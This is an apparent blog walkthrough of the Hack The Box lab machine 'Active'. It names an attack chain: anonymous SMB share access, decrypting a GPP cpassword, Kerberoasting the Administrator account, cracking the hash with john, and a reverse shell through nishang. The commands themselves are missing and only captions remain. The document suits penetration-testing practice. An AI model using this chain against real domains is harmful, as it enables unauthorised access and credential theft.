Introduction

Today I explore Active from HTB; an OSCP like box featuring a great approach to SMB enumeration with SMBClient and CrackMapExec (cme). I started by running an AutoRecon scan which showed me LDAP, Kerberos and SMB running.

I have mentioned AutoRecon in (every) guide so look at my previous posts for more information.

SMBClient shows a share, Replication available as Read. I use CME to verify:

Copy
Running CME shows I can read Replication with null authentication.

Running CME shows I can read Replication with null authentication.

I log in to SMBClient with the --no-pass flag and look around the directories. Eventually, I find Groups.xml which I pull to my local machine. Inside is a cpassword which I decrypted with the help of gpp-decrypt. For more information regarding cpasswords go HERE.

Copy
Finding Groups.xml and a password.
CPassword found inside Groups.xml

Finding Groups.xml and a password.

Using the password found I use GetUserSPNs.py to find the Administrator hash. I crack this hash with the help of john.

Copy
GetUserSPNs.py grabbing the Administrator accounts hash.

GetUserSPNs.py grabbing the Administrator accounts hash.

Using john to grab the krb5tgs password.

Using john to grab the krb5tgs password.

Using the Administrator password, CME and Invoke-PowerShellTCP.ps1 from nishang I get a shell onto the box and root:

Using the Admin creds alongside CME and Invoke-PowerShellTCP to launch a shell.
Using the Admin creds alongside CME and Invoke-PowerShellTCP to launch a shell.

Using the Admin creds alongside CME and Invoke-PowerShellTCP to launch a shell.

Tab1

Copy

Tab2

Copy

Tab3

Copy
HTB Active proof (not clean) as & param kept dropping the shell.

HTB Active proof (not clean) as & param kept dropping the shell.

Rooted

Published On: October 20th, 2020 / Categories: HTB, Technology / Tags: , , , , , , /

Leave A Comment